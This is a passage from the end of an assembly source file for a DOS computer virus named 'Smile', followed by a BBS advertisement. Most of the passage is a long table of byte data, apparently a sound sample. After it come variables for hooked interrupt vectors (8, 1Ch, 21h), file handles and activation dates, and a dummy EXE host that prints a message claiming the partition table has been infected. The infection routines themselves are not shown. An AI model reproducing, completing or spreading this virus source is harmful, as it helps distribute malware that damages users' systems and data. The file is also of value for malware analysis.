db 25,199,129,156, 76, 49,197,195, 28,110, 57,231,129,156,120, 25
|
|||
|
db 197,145,156,108, 25,102,201,158, 46, 12,113,224,231,141,163, 60
|
|||
|
db 76, 25,227,104,228,229,131,131,154,157, 24,102,114,206, 71,193
|
|||
|
db 241, 14,229,140, 55,196,241,125, 89, 27, 29,195,240,157, 30, 68
|
|||
|
db 193,246, 57,135, 99, 56,238, 25,134,196,241,230, 24, 6, 24,176
|
|||
|
db 231, 51,142,113,178,113,205, 55,160, 67, 57,198,143,177,147, 56
|
|||
|
db 115,135, 89,193,157, 56,103,156,112,115,102,217,227, 30, 76,121
|
|||
|
db 156,241, 35, 71, 56,227,155, 12,103,190, 56,115,198,105,150, 97
|
|||
|
db 142, 28,113,230, 50, 60,185,201,156, 76,248,231, 13,204,248,100
|
|||
|
db 199, 39, 28,113,198, 70, 71, 54,124,219, 99,135, 48, 62, 25,131
|
|||
|
db 112,196, 31, 14, 51,225,225, 56,110, 1,206, 51,147,110, 15,129
|
|||
|
db 252,127, 7,113,184, 29,135,192,236, 62, 7,227,224,127, 31, 3
|
|||
|
db 176,240, 63,143, 1,216,248, 29,143,131,184,248, 63, 15,131,112
|
|||
|
db 248,102, 28,134,225,208,238, 61, 12,199,161,220, 90, 25,199, 35
|
|||
|
db 184,244, 51,139, 67, 56,164,119, 22,134,115,104,238, 60,140,226
|
|||
|
db 217,206,105, 25,204,179, 28,211, 51,137, 38, 57,180,199, 50, 76
|
|||
|
db 115, 44,199, 50,156,230, 73,142,101,152,230, 89,142,116,153,230
|
|||
|
db 217,158,109,153,227, 65,142, 54, 14,241,176,102,198, 17,199, 26
|
|||
|
db 14,204,105, 59, 49,131,156,153,135,135, 19, 24, 30, 59,134, 99
|
|||
|
db 188, 48,195,112,198, 57,216,198, 44,110, 76,205, 50, 76,176,110
|
|||
|
db 19, 49,215, 48,222,199, 15,153,102,107, 38,195, 50,108, 51, 44
|
|||
|
db 113,228,201, 60,204,241,204,184,100,204,198, 57,227, 32, 30,127
|
|||
|
db 193,156,113,184,155, 24,201,201, 48,108,231,134, 70,112,102, 28
|
|||
|
db 103,115,177,118, 49,135, 19, 57,177,155, 31, 28,121,248,230, 31
|
|||
|
db 134, 96,248,230, 60,102,115, 51, 28, 51, 25,137,153,140,223,153
|
|||
|
db 197,198, 92, 46,115, 99,243,115, 25,179, 57,153,177,217,248,207
|
|||
|
db 76,204,243, 51, 27, 60,201,140,115, 28, 99, 51,137,227, 56,127
|
|||
|
db 19,185,222,115,241,230, 31,129,224,252, 15, 7,225,248, 62, 15
|
|||
|
db 131,224,120, 62, 7,129,240,120, 30, 7,129,224,124, 62,135,135
|
|||
|
db 145,240,241, 62, 60,143, 15,145,225,228,120,124, 15, 15, 3,227
|
|||
|
db 228,120,124, 31, 27,131,227, 96,252,108,159, 13,147,163,176,116
|
|||
|
db 118, 14, 7,193,224,248, 60, 31, 7,195, 96,232,108, 28, 13,131
|
|||
|
db 147,241,240,116, 62, 14,135,193,240,248, 62, 15, 14,192,225,216
|
|||
|
db 152, 63, 27, 15,195,193,248,124, 63, 15, 7,224,240,254, 30, 14
|
|||
|
db 227,192,238, 60, 30,227,224,231,143, 67,172,121,158, 51,144,112
|
|||
|
db 230, 88,207,193,179, 59,135, 99,198, 12,204,241,219, 7, 19,240
|
|||
|
db 228,110, 31,133,193, 48,120,230, 44,205,225,158, 54, 49,166,120
|
|||
|
db 220, 19,140,131,176,116, 79,131,129,204,124, 31, 3,193,249,204
|
|||
|
db 140,150, 38, 72,199,153,152,248,126,142, 79,131,131,248,190, 31
|
|||
|
db 15,195,241,120,236, 96,204,143, 14, 57, 57,248,110, 62,103, 33
|
|||
|
db 216,248, 57, 31, 6,102,120,207, 28,216, 14, 6, 99, 96,204, 60
|
|||
|
db 121, 51, 67,137,207, 17,156, 57, 30, 11,198,230, 51, 51,157,179
|
|||
|
db 148, 96,247,113,192,204,206, 15, 35,152, 28, 30, 38,224,248,153
|
|||
|
db 206,227,225,113,142, 67,152,152, 89, 56,131,134,242, 56,227, 28
|
|||
|
db 23,131,120, 62, 15,225,248, 63, 7,193,240,126, 15,129,224,124
|
|||
|
db 31, 7,192,248, 62, 15,131,224,248, 62, 15,131,224,248, 60, 15
|
|||
|
db 135,208,248,121, 31, 15, 33,225,228, 60, 30, 71,195,200,248,124
|
|||
|
db 15,135,193,248,248, 31, 31,131,225,240, 62, 31, 3,131,240,120
|
|||
|
db 59, 15, 3,176,102, 55, 14,195,112,236, 55, 15,195,112,252, 55
|
|||
|
db 143,195,248,240, 63,143, 3,184,249, 27,199,161,252, 57, 31,195
|
|||
|
db 193,252, 60, 31, 99,192,242, 60, 79, 25,230,121,207,177,206, 62
|
|||
|
db 199, 24,240, 30, 51,192,240,252, 27,143,161,240,126, 30,135,192
|
|||
|
db 248, 60, 31,135,192,248,126, 15,135,129,196,184, 47, 13,195,216
|
|||
|
db 126, 27,135,201,226, 28, 70, 13,226,112,124, 71, 3,231,188, 78
|
|||
|
db 30, 24,227,241,234, 62, 15,161,248, 62, 15, 7,112, 90, 99,112
|
|||
|
db 230, 25,147,225,240,110, 61,198,240,116, 29, 23,103, 48,240, 58
|
|||
|
db 47,143,113,206, 51,198,192,126, 62, 15, 7, 97,236, 62, 31, 7
|
|||
|
db 240,254, 63, 15,195,240,190, 31,143,128,248, 62, 63,143, 99,152
|
|||
|
db 243, 60, 31, 7,129,216, 28, 7, 12,211,188,124, 7, 39,192,116
|
|||
|
db 119, 14,195,156,120,188, 7,195,192,239, 31,131,196,120,220, 19
|
|||
|
db 204,120,147,248, 89,129,216,223,140,252,253,143, 60,237,143, 28
|
|||
|
db 207,142,120,223, 30,241,254, 57,227,252, 99,139,177,158, 46,133
|
|||
|
db 248,242, 14,199,192,251, 31, 2,236,249, 31,115,228, 29,139,160
|
|||
|
db 236, 89, 7, 99,228, 57,159, 33,236,120, 15, 35,100, 57,155, 53
|
|||
|
db 196,104,143, 51,102,184,141, 16,230,124,199, 57,226, 28,199,144
|
|||
|
db 230, 60, 67,153,242, 28,231,200,115, 30, 97,204,121,143, 49,230
|
|||
|
db 60,199,136,115,143, 1,198, 60,103,140,113,142, 56,211, 30,120
|
|||
|
db 240, 30, 60, 62, 77,207,153,225,124,124,153,118,126, 28,193,230
|
|||
|
db 60,135,129,242, 60,103,135,112,124, 31,140,112,238,120,227,184
|
|||
|
db 159,142,112,238, 57,145,231, 9,199,217,134,100,108, 3,163,248
|
|||
|
db 110,207,136, 97,199, 32,231, 63,135,136,242,102, 52,217,180,113
|
|||
|
db 198,112,227, 57,199, 4,193,204,115,142, 35, 12,219,156,118, 92
|
|||
|
db 203, 24, 99,128,241, 60, 39,204, 57, 31, 36,201,157, 19,230,108
|
|||
|
db 205,159, 99, 46,237,217, 51, 39,204, 28, 7, 12,120, 28,115,206
|
|||
|
db 124,142, 51,178, 60, 57,158, 62, 99, 12,153,209, 28,226,140, 51
|
|||
|
db 195, 24,243,188,230,217,227,144,240,158, 19,134,112, 79,200,241
|
|||
|
db 63,198,225,231,145,226,126, 79,129,243, 60, 79,129,240,120, 31
|
|||
|
db 3,192,240, 62, 15,193,240,120, 31, 3,225,240, 62, 31, 3,224
|
|||
|
db 240, 63, 15, 3,224,240, 63, 31, 7,225,240,126, 63, 7,225,248
|
|||
|
db 126, 31,135,225,220,110, 29,227,112,207, 27, 7,124,111, 28,241
|
|||
|
db 190, 60,227,100, 76,243, 60, 71,152,224,248, 63,135,227,248,126
|
|||
|
db 28,135,129,224,248, 63, 31,131,145,240,124, 47, 15,227,240,126
|
|||
|
db 31,131,224,248, 62, 31,198,241,220, 59, 15, 49,224, 56,143, 17
|
|||
|
db 199,185,248,126, 31,133,224,248, 62, 59,135, 96,252, 60, 23,197
|
|||
|
db 192,248, 60, 31, 49,196,241,216, 51,153,195,141,140,140, 62, 71
|
|||
|
db 102,248,190, 61,199,144,226, 62, 51,129,225,252, 62, 19,100,230
|
|||
|
db 49,140,115, 28, 3,160,224, 60, 71,131,226,248,156, 51,131,113
|
|||
|
db 248, 59,143,137,198, 56, 46, 29,193,240,230, 61,199, 57,230, 56
|
|||
|
db 215, 23, 38,120,230, 57,198, 35,198,108,141,148,113, 57,226, 57
|
|||
|
db 199,120,254, 15, 99,248, 70,197,200, 59, 31,225,248,191, 7,195
|
|||
|
db 232,126, 31, 3,240,252, 61,143,225,204,127, 14, 99,252,115,143
|
|||
|
db 227,204,119,143, 49,206, 60,199, 56,121,142,112,227,140,113,143
|
|||
|
db 199,216, 60,199, 33,248,121,143, 1,198, 57,198,204,227,156,224
|
|||
|
db 126, 30, 67,227, 56, 62, 29,143, 25,200,230, 30, 99,204,113, 14
|
|||
|
db 49,131, 92,197,206,120,238, 17,200,121, 7, 25,196, 24,222, 7
|
|||
|
db 0,112, 98, 61,142, 99,252, 63, 15,140,236,198,115, 70, 78,224
|
|||
|
db 220, 51,134,112, 78, 55,135,112,230, 56,254, 49,195,152,124,103
|
|||
|
db 35,182,113,133,225,188, 14,131,182, 62,121, 51, 7, 44,227, 25
|
|||
|
db 223, 24,228, 79,199,192,124, 15, 0,226,120,153, 49,202, 26, 39
|
|||
|
db 113,240,187, 31,225,240,117, 12,200,232,230, 51, 39,140,241, 29
|
|||
|
db 25,200,113,155,153, 62, 30, 3,168,113, 30, 1,195, 48, 76,127
|
|||
|
db 142, 99, 29,175, 57,142,195,243,220, 24,142, 3,136,248, 30, 19
|
|||
|
db 70,240,123, 59,199,120,227, 56,115, 15,199,248,248, 31, 3,193
|
|||
|
db 216, 57,142,113,206, 57,177,183,121,185, 3,248,206, 11,156,115
|
|||
|
db 129,156, 55,145,216, 95, 19,241,190,103,227,248, 31,139,240,118
|
|||
|
db 31,193,216,127, 7,113,126, 29,199,248,127, 15,224,252, 63,195
|
|||
|
db 184,255, 12,227,252, 51,142,240,206, 57,195,152,115, 12,227,156
|
|||
|
db 115,142,113,206, 56,199, 56,227, 28, 97,140,121,198, 57,231, 28
|
|||
|
db 227,156,115,143, 56,199, 14,120,143,134,120, 79, 14,120,223, 15
|
|||
|
db 222, 51,227, 29,193,252,103,135,152,142, 12,228,114, 59,152,204
|
|||
|
db 224, 55, 25,241,156,100,199, 57,185, 28,199,204,113,159, 24,198
|
|||
|
db 7, 2, 57,207, 12,113,198, 56,249,193,220,115, 7, 3,225,240
|
|||
|
db 30,208,226, 28, 97,192, 56,193, 67, 51, 49,142,207,140,240,142
|
|||
|
db 49,227,156,103,131, 57,142, 99,226, 60, 15,128,240, 30, 7,145
|
|||
|
db 249, 14, 1,224, 61,131,240,115, 14, 65,248,121, 7,160,230, 63
|
|||
|
db 195,220, 63,135,240,158, 25,195, 24,231, 24, 99,156, 49,206,115
|
|||
|
db 135, 57,200,156,103, 48,113,142,112,198, 59,195, 24,231, 14,113
|
|||
|
db 156, 27,196,112,231, 61,241,220,127,134,113,220, 29,199, 55,127
|
|||
|
db 15,225,252, 31,135,248, 31, 15,231,156,103, 14,227,252, 51,152
|
|||
|
db 61, 6,120,207, 3,248,158, 7,240, 62, 67,224,124, 15,224,252
|
|||
|
db 143,192,241, 31,129,226, 62, 7,192,252, 31,129,248, 63, 7,240
|
|||
|
db 124, 15,193,248, 63, 7,224,254, 31,193,248, 63, 7,240,254, 15
|
|||
|
db 193,252, 63,131,240, 63, 7,224,126, 31,193,252, 63,131,248,190
|
|||
|
db 7,241,124, 31,227,252, 63,195,248, 63,199,240,125,199,216,120
|
|||
|
db 227, 14, 48,248, 15,128,252, 31,195,248,103, 3,241,220, 7,195
|
|||
|
db 248,127,135,240,126, 15,224,252, 31,129,248, 63, 7,240,120, 15
|
|||
|
db 128,240, 63, 15,224,254, 31,193,248, 31, 3,225,246, 31,195,220
|
|||
|
db 63,131,240, 63,131,224,126, 7,224,252, 31,195,252, 62, 7,248
|
|||
|
db 124, 15,177,248, 15, 3,240,254, 7,128,248, 15, 1,248, 30, 7
|
|||
|
db 192,124, 15,129,242, 59,131,192,116, 30, 3,232,126, 7,224,254
|
|||
|
db 7,192,252,103, 3,152,244, 23, 3,224, 60, 7,194,188, 7,129
|
|||
|
db 252, 47, 7,176,126, 15,224,252, 25,194,241, 57,199,112,112, 15
|
|||
|
db 1,248, 31,135,240,255, 15,225,248, 31,131,248,124, 3,240,124
|
|||
|
db 15,129,240, 31, 3,224,125, 7,160,126, 15,192,230, 28,227,136
|
|||
|
db 120, 7,176,244, 30,193,240, 61, 7,176,246, 14, 1,200, 28, 3
|
|||
|
db 128, 60, 7,134,120, 79,129,248,127, 7,230,120,199,152,225, 14
|
|||
|
db 115,192, 57,199, 28,115, 7, 25,254, 78,231, 59,221,200, 15,204
|
|||
|
db 156,152, 14,236,252,136,142,236,204,136, 76,204,249,144, 25,147
|
|||
|
db 114,100,118,111,145, 39,191,249, 19,247, 36,127,152, 19,254,136
|
|||
|
db 159,176, 7,254, 1,127,192, 31,252, 1,255,128, 31,230, 65,254
|
|||
|
db 0,127,216, 19,254, 1,127, 32, 15,248, 1,255,192, 31,248, 3
|
|||
|
db 254, 0,255,192, 31,248, 1,255,128, 31,224, 7,252, 9,190, 96
|
|||
|
db 15,236, 9,255, 0,159,176, 7,251, 2,127,128, 31,216, 11,252
|
|||
|
db 129,191,144, 15,252, 3,255,128, 63,228, 13,254, 0,255,240, 7
|
|||
|
db 254, 1,191,192, 31,252, 1,255, 0,127,248, 19,127,129, 63,228
|
|||
|
db 15,254, 0, 63,224, 13,254, 34, 55,228, 73,254,100,223,124,201
|
|||
|
db 191,224, 25,179, 32, 79,236,137,255,192, 79,254, 0,255,200, 23
|
|||
|
db 249, 32,155,108,130,102, 76,200,204,222, 4,166,251, 19, 32, 31
|
|||
|
db 236,140,236,204,108,204,153, 20,217,153, 25,179, 32,118,249,166
|
|||
|
db 219, 32, 23,108,146,108,200,111,230, 70,236,195, 63, 36, 71,201
|
|||
|
db 153, 59, 36,219,178,110,236,130, 93,194,102,249, 32,207,228, 66
|
|||
|
db 123,146, 59, 51, 38,153, 50,219,100,251,153,157,154,100, 99, 54
|
|||
|
db 108,195, 50,121,182,217,166,125, 50, 79, 54, 73,178,204,214,108
|
|||
|
db 147, 51, 33,147,108,200,155,177, 37,179,102, 3,237,140,154,136
|
|||
|
db 155,246, 68,255,236,137, 19, 63,204,153,191,144, 19,254, 64, 79
|
|||
|
db 252, 4,255,128, 63,240, 7,255, 19,119,233, 19, 51, 34, 55,120
|
|||
|
db 2,110,201, 63,220,139,230, 98,127,140,102,243,201,155,216, 7
|
|||
|
db 243, 19,124,204,137,190, 3,246,115, 51, 38,100,219, 96, 59, 62
|
|||
|
db 68,155,200,159,236,201,178,100, 73, 51, 19,153,140,155, 49, 19
|
|||
|
db 236,131,127,241, 3,252,205,222, 25,153,255,145, 62, 3,102, 76
|
|||
|
db 217, 31,204, 31,153,191,112, 63,177,187,204, 76,119,112, 29,196
|
|||
|
db 27,243, 38,204,199, 51, 54, 76,157,230, 77,217,144, 63,228, 79
|
|||
|
db 100,178,100,205,143,236, 25,147,120,129,248, 3,252,146,220,132
|
|||
|
db 216,157,217,183, 51, 35,147,205, 36,216, 25,155, 50,101,147,147
|
|||
|
db 38,196,105, 50, 71,199, 28,216,115, 48,205,179, 38,216, 60,179
|
|||
|
db 97,230,109,147,110, 38,121, 48,227, 64,204,198, 7, 14,108, 76
|
|||
|
db 184,240,195,239,134,115, 55,137, 15,184, 38,108, 12, 25,204,104
|
|||
|
db 243, 97,147,199, 39,152, 54,125, 49,243,179,102,205,204,155, 54
|
|||
|
db 126, 89, 60,217,102,195, 39,131, 79, 7,156, 38,121, 48,112,217
|
|||
|
db 225,159,227, 19, 12,150, 67, 54, 77,188,153, 60,250,108,155,108
|
|||
|
db 61,200,134, 79, 46,192,221, 3,255, 17,240,255,240, 62, 13,254
|
|||
|
db 19,178,223,128,204, 39,209, 44,153,225,180, 29,225, 60, 63,194
|
|||
|
db 120, 63, 1,248,188, 15,113,116, 27, 7, 51,204,115, 30,230, 59
|
|||
|
db 133,241, 60, 7,145,236,206,195,184,222, 3,137,242, 60,140, 99
|
|||
|
db 228,241,159, 23, 68,216,249, 15, 17,134,199, 65,126, 63, 7,216
|
|||
|
db 254, 31,227,232, 59,143,226,254, 55,135,241,188,101,199, 57,135
|
|||
|
db 198,112,159, 31,195,248,158, 71,249,199,145,240,248, 15,103,204
|
|||
|
db 19,141,195, 56,143,129,252, 7,167,241, 61,140,225,156, 3,136
|
|||
|
db 114, 30, 49,204,240,118, 48,195, 30, 71,192,121, 23, 1,248,198
|
|||
|
db 48,236, 49,156,241, 12,143,130,120,254, 15,226,184,251, 19,217
|
|||
|
db 253, 39,155, 98, 45,144,204, 55,155,113,159, 39, 97,242,187, 6
|
|||
|
db 244,195, 60,102,217,131, 38, 51,129,196,198, 12,224,198,125,100
|
|||
|
db 147,201, 53,159, 99, 60, 27, 97,188,142, 55,128,241,204,198,109
|
|||
|
db 130, 25,229,152,121,147, 49,140,153, 36,194,115, 24,198,121, 39
|
|||
|
db 152,243, 55, 19,198,126, 25,201,236,247, 25,196,120,141, 36,243
|
|||
|
db 46, 49,152,242, 12,195,199, 61,143,136,217,142,103, 56,205,129
|
|||
|
db 144, 25,135,185,156, 63,152,202, 59,135, 55,137,230,122,108,220
|
|||
|
db 61,184,206,102, 62,102, 31,142,153,231,211,206,225,231,151,105
|
|||
|
db 246,199,241,249,143,195,246,159,147,223,142,209,251,143,227,157
|
|||
|
db 159, 99,207, 25,199, 24,126,143,230,120,158,113,218, 63,199,240
|
|||
|
db 237,142,131,159, 57,230,120,238, 63,227,152,231,142,115, 30,115
|
|||
|
db 140,249,230,117,227,156,251,140,227,188,119,152,241, 26, 96,206
|
|||
|
db 97,135, 61,199,159, 57,103,188,103, 24,241,248,115, 56,230, 6
|
|||
|
db 227,188,115,204,124, 31,141,193,214,115,198,119,135, 49,142, 60
|
|||
|
db 199, 48,115, 28,227,156,113,140,113,198, 24,198, 56,115, 26, 33
|
|||
|
db 205,204,131, 51, 31, 12,206, 60, 51,152, 49,206, 99,199, 51,140
|
|||
|
db 205,142, 60, 51,152,224,228,227,153, 49,198,198,227, 51,143, 14
|
|||
|
db 134, 54,118, 56,152,252, 99,227,185,207,143,198,103, 51,142,156
|
|||
|
db 159, 28,224,113,179,140,228,204, 39, 71,113,156,100,228,225,163
|
|||
|
db 137,204,158,103, 49,115, 12,193,204,199,139,204,204, 51,163, 26
|
|||
|
db 56,204,225,198, 27,211,120,255, 46,225,239, 31,135, 92,111, 27
|
|||
|
db 147,156,114,229,147,142, 49,204,103,142, 57,156,152,236, 28,131
|
|||
|
db 179,113,198, 32,238, 53, 15, 29,241,120,247, 62, 53, 25,158, 48
|
|||
|
db 11,153, 54, 15, 28,230, 28,241,220,241,206,225,175, 27,134,102
|
|||
|
db 103, 24,249,220,102,204,243, 51, 51,140,204,166, 51,103, 57,153
|
|||
|
db 147,103,104,206,121,204, 99,204,123, 60, 25, 38, 51, 98,218,123
|
|||
|
db 22, 70, 28,219, 44,147, 76,192,227,200, 49,205,164,219,154,102
|
|||
|
db 23, 54, 78, 60,218,100,216,210,100,241,228,231,201,167, 57,140
|
|||
|
db 54, 15,206, 51, 47, 35,136,201,153, 35,140,115,134, 58,115,102
|
|||
|
db 120,236,204,153,163,120,198, 51,152, 54,204,225,147,101,201, 51
|
|||
|
db 13,193,178, 62, 77,195, 52,207,202,204,120,193,142,108,209,227
|
|||
|
db 28, 97,147, 19,152, 56,227,142, 92,240,199, 30, 48,241,207, 25
|
|||
|
db 108,157,109,199,155, 28, 97,155, 39, 28,241,205, 30, 24,226,199
|
|||
|
db 28, 49,225,134, 56,229,154,108, 97,207, 62, 56,231, 14,124,200
|
|||
|
db 54, 76,227,156, 56,227,143, 12,104,231, 28,179,103, 60,249,227
|
|||
|
db 135, 28,120,227, 6, 24,115,139, 56, 56,199,134, 56,115,199, 60
|
|||
|
db 153,204,222,108,241,195, 30, 60, 49,199,142, 24,112,227,134,115
|
|||
|
db 51,155, 28,113,205,134,120,242, 99,143, 30,113,154, 44,249,231
|
|||
|
db 150,124,113,241,158, 25, 98,206, 92,179,231,143, 56,227,166, 12
|
|||
|
db 32,199, 48,105,147, 25,156,108,204, 28, 51, 39,198,153,176,224
|
|||
|
db 252,216,103, 30, 71,205,131, 1,204,217,145,114, 60, 62,125, 60
|
|||
|
db 31, 30, 76,158, 22,108,217, 25,176,204,158, 55,137,140,220,104
|
|||
|
db 226,204,105,241,204,201,227,204,201,227,140,203,195,156,207,199
|
|||
|
db 28,199,195,140,199,195,156,199,231,140,199,195,156,207,206,121
|
|||
|
db 159, 38, 57,153,142,121,153,156,241,145,140,241,179,153,241,178
|
|||
|
db 204,209,131,153,227, 38,217,205,151, 28,198,103, 59, 25, 50, 77
|
|||
|
db 153, 46,121,140, 39, 49,140, 51, 50,102, 76,115,198, 12, 99,156
|
|||
|
db 99,102,147,248,205,156,119,142,156,126, 76, 12,110, 77,152,236
|
|||
|
db 198, 56,102,102,120,220,243, 76,206,100,152,198, 49,153,152, 60
|
|||
|
db 223, 28,189, 55, 25,198, 15, 60,114, 14, 25, 51,207, 50,227, 19
|
|||
|
db 36, 67,223,102,199, 92,102,131, 4,100,115,126,236,214, 48,108
|
|||
|
db 77,191,204, 6,124,253,152, 32,255,136, 78,243,128,127,240, 59
|
|||
|
db 255, 0, 63,252, 15,251,192, 31,254, 3,255,192, 31,254, 3,255
|
|||
|
db 192, 63,252, 15,127, 0,127,240, 3, 16, 7,255,240, 32, 15,251
|
|||
|
|
|||
|
SampleEnd equ this byte
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Variables
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
Active db -1
|
|||
|
ActiveYear dw -1
|
|||
|
ActiveDate dw -1
|
|||
|
|
|||
|
OldInt8 equ this dword ; orginal interrupt 8
|
|||
|
OldInt8o dw -1
|
|||
|
OldInt8s dw -1
|
|||
|
OldInt1C equ this dword ; orginal interrupt 1ch
|
|||
|
OldInt1Co dw -1
|
|||
|
OldInt1Cs dw -1
|
|||
|
OldInt21 equ this dword ; orginal interrupt 21h
|
|||
|
OldInt21o dw -1
|
|||
|
OldInt21s dw -1
|
|||
|
|
|||
|
Count dw -1 ; timer count
|
|||
|
SampleOffset dw -1 ; Used to make sound
|
|||
|
SampleBit db -1
|
|||
|
SampleFlag db -1
|
|||
|
Handle db 24 dup(-1) ; Filehandles
|
|||
|
|
|||
|
cseg ends
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Orginal EXE-file
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
mseg segment public 'code'
|
|||
|
assume cs:mseg, ds:mseg, es:mseg
|
|||
|
|
|||
|
|
|||
|
db 'MZ' ; header
|
|||
|
dw PrgSize ; PartPage
|
|||
|
dw 1 ; PageCount
|
|||
|
dw 0 ; relocation items = 0
|
|||
|
dw 0 ; headersize = 0h
|
|||
|
dw 80h ; minimum memory
|
|||
|
dw 0ffffh ; maximum memory
|
|||
|
dw (PrgSize+15)/10h ; ss
|
|||
|
dw 7feh ; sp
|
|||
|
dw 0 ; chksum
|
|||
|
dw offset Orginal ; ip
|
|||
|
dw 0 ; cs
|
|||
|
dw 1ch ; offset relocation table
|
|||
|
dw 0 ; overlay number
|
|||
|
|
|||
|
Orginal: mov ah,9 ; display warning
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov dx,offset Warning
|
|||
|
int 21h
|
|||
|
mov ax,4c00h
|
|||
|
int 21h ; terminate
|
|||
|
|
|||
|
Warning db 13,10
|
|||
|
db 'WARNING:',13,10
|
|||
|
db 13,10
|
|||
|
db 'Smile virus has now infected the partition table !!!!!',13,10
|
|||
|
db 13,10
|
|||
|
db '$'
|
|||
|
|
|||
|
mseg ends
|
|||
|
|
|||
|
sseg segment stack 'stack'
|
|||
|
db 800h dup(?)
|
|||
|
sseg ends
|
|||
|
|
|||
|
end Main
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|